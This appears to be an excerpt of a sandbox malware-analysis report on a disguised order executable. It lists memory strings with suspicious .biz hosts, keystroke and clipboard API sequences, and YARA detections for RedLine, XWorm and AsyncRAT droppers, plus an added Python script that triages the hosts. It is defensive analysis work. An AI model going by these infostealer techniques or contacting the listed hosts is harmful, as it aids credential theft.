Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000007.00000002.2500110094.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1365957011.0000021980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1497950092.0000026860151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: powershell.exe, 00000010.00000002.1365957011.0000021980229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1497950092.0000026860378000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1637024556.0000020C583C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: alg.exe, 00000003.00000003.1290392743.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000002.1394576368.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ssbzmoy.biz/
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/D
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: build.exe, 00000006.00000002.1724819529.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: build.exe, 00000006.00000002.1724819529.0000000002DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: build.exe, 00000006.00000002.1724819529.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: build.exe, 00000006.00000002.1724819529.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7
Source: build.exe, 00000006.00000002.1724819529.0000000002E54000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: build.exe, 00000006.00000002.1724819529.0000000002E54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: build.exe, 00000006.00000002.1724819529.0000000002E54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: alg.exe, 00000003.00000003.1327233755.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1327335153.00000000004DA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1330185841.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1326089559.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1341584430.00000000004D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ww12.przvgke.biz/vi?usid=25&utid=9811636311
Source: alg.exe, 00000003.00000003.1327233755.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ww12.przvgke.biz/vi?usid=25&utid=9811636311LocationETagAuthentication-InfoAgeAccept-RangesLas
Source: powershell.exe, 0000001D.00000002.1637024556.0000020C583C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000010.00000002.1433852870.00000219F93E9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1850743091.0000020C70AA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1847404696.0000020C70770000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: alg.exe, 00000003.00000003.1489388095.00000000014E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 00000010.00000002.1365957011.0000021980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1497950092.0000026860151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: RegSvcs.exe, 00000005.00000002.1272520755.0000000003CB4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1272520755.0000000003D34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1272520755.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000000.1258507285.00000000006B2000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: alg.exe, 00000003.00000003.1536468883.0000000001450000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: alg.exe, 00000003.00000003.1537846730.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1538061598.0000000001450000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: powershell.exe, 0000001D.00000002.1808303171.0000020C68213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001D.00000002.1808303171.0000020C68213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001D.00000002.1808303171.0000020C68213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 0000001D.00000002.1637024556.0000020C583C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000010.00000002.1416575661.0000021990076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1569294071.00000268701C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1808303171.0000020C68213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: alg.exe, 00000003.00000003.1313784977.00000000014E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.7-zip.org/
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
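The URL strings above are a mixed bag: .NET and PowerShell runtime artefacts (tempuri.org, contoso.com, nuget.org, Pester on github.com, the zlib and 7-Zip credits), search-engine and favicon URLs of the kind a browser profile stores (found in build.exe), a public-IP lookup (api.ip.sb, present in both RegSvcs.exe and build.exe), and one unfamiliar host pulled from alg.exe memory (ww12.przvgke.biz). The Python below is an added example and not part of the Joe Sandbox report: it parses lines in the report's "String found in binary or memory" form, splits URLs that the memory scan ran together, records which processes each host came from, and applies allow-lists (an assumption of this example, not something the report states) so that only hosts needing an analyst remain. The sample lines are copied from the report above.

```python
import re
from urllib.parse import urlsplit

# Constructed input: a few lines copied from this report, in the report's own
# "Source: <process>, <dump>[, ...] String found in binary or memory: <string>" form.
SAMPLE_LINES = """\
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9
Source: alg.exe, 00000003.00000003.1327233755.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ww12.przvgke.biz/vi?usid=25&utid=9811636311LocationETagAuthentication-InfoAgeAccept-RangesLas
Source: powershell.exe, 0000001D.00000002.1637024556.0000020C583C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: RegSvcs.exe, 00000005.00000002.1272520755.0000000003CB4000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000000.1258507285.00000000006B2000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 0000001D.00000002.1808303171.0000020C68213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
"""

LINE_RE = re.compile(r"^Source: (?P<sources>.+?) String found in binary or memory: (?P<payload>.+)$")
PROC_RE = re.compile(r"\b([\w-]+\.exe)\b")
# Memory strings are frequently run together ("...favicon.icohttps://..."), so a URL
# ends where the next scheme begins rather than at the end of the line.
URL_RE = re.compile(r"https?://(?:(?!https?://)\S)+")

# The classification lists are assumptions of this example; tune them to your environment.
EXPECTED_HOSTS = {           # runtime / tooling artefacts, not attacker infrastructure
    "tempuri.org",           # default namespace in .NET web-service proxies
    "contoso.com",           # placeholder domain in Microsoft PowerShell module metadata
    "nuget.org", "aka.ms", "www.microsoft.com",
    "github.com",            # Pester ships with Windows PowerShell
    "www.apache.org", "www.winimage.com", "www.7-zip.org",
    "clients2.google.com",   # Chrome extension update endpoint
}
BROWSER_DATA_HOSTS = {       # search-engine / favicon URLs as stored in a browser profile
    "duckduckgo.com", "ac.ecosia.org", "cdn.ecosia.org", "www.ecosia.org",
    "ch.search.yahoo.com", "www.google.com", "gemini.google.com",
}
IP_CHECK_HOSTS = {"api.ip.sb"}   # public-IP lookup; in this report it sits in RegSvcs.exe and build.exe


def classify(host):
    if host in IP_CHECK_HOSTS:
        return "ip-check"
    if host in EXPECTED_HOSTS:
        return "expected"
    if host in BROWSER_DATA_HOSTS:
        return "browser-data"
    return "review"


def triage(report_text):
    """Map each host to its verdict, the processes whose memory held it and the raw URLs."""
    findings = {}
    for line in report_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # code-function, YARA and static-PE lines are skipped
        procs = set(PROC_RE.findall(m["sources"]))
        for url in URL_RE.findall(m["payload"]):
            host = urlsplit(url).hostname
            if not host:
                continue
            entry = findings.setdefault(
                host, {"verdict": classify(host), "processes": set(), "urls": set()})
            entry["processes"] |= procs
            entry["urls"].add(url)
    return findings


def review_hosts(findings):
    """Hosts that survived the allow-lists and need an analyst (or a passive-DNS lookup)."""
    return sorted(h for h, e in findings.items() if e["verdict"] == "review")


if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for host in sorted(result, key=lambda h: (result[h]["verdict"], h)):
        e = result[host]
        print(f'{e["verdict"]:<12} {host:<24} {",".join(sorted(e["processes"]))}')
    print("to review:", review_hosts(result))
```

Two caveats when using this on the full report. A string in memory says what a process has read or carries, not where it connected: the search-engine URLs in build.exe describe browser data, and network destinations should be taken from the report's contacted-hosts and IDS sections instead. The allow-lists only cover strings that a known runtime or library explains; a truncated host such as www.microsoft.co stays in the review list until it is resolved rather than being guessed at.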
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00474164
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00473F66
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_0046001C
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_0048CABC

System Summary

Source: 5.2.RegSvcs.exe.3d96bf0.6.raw.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.3d007a0.4.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 6.0.build.exe.6b0000.0.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.3d007a0.4.raw.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.2d0ea18.1.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.2d0ea18.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.RegSvcs.exe.3d4b9d0.5.raw.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.2d0ea18.1.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.2d0ea18.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.RegSvcs.exe.2d18074.2.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.2d18074.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.RegSvcs.exe.2d053d4.3.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.2d053d4.3.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.RegSvcs.exe.2d18074.2.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.2d18074.2.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.RegSvcs.exe.2d053d4.3.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.2d053d4.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.0.XClient.exe.b20000.0.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 7.0.XClient.exe.b20000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.RegSvcs.exe.3d96bf0.6.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.3d4b9d0.5.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000000.1260246043.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
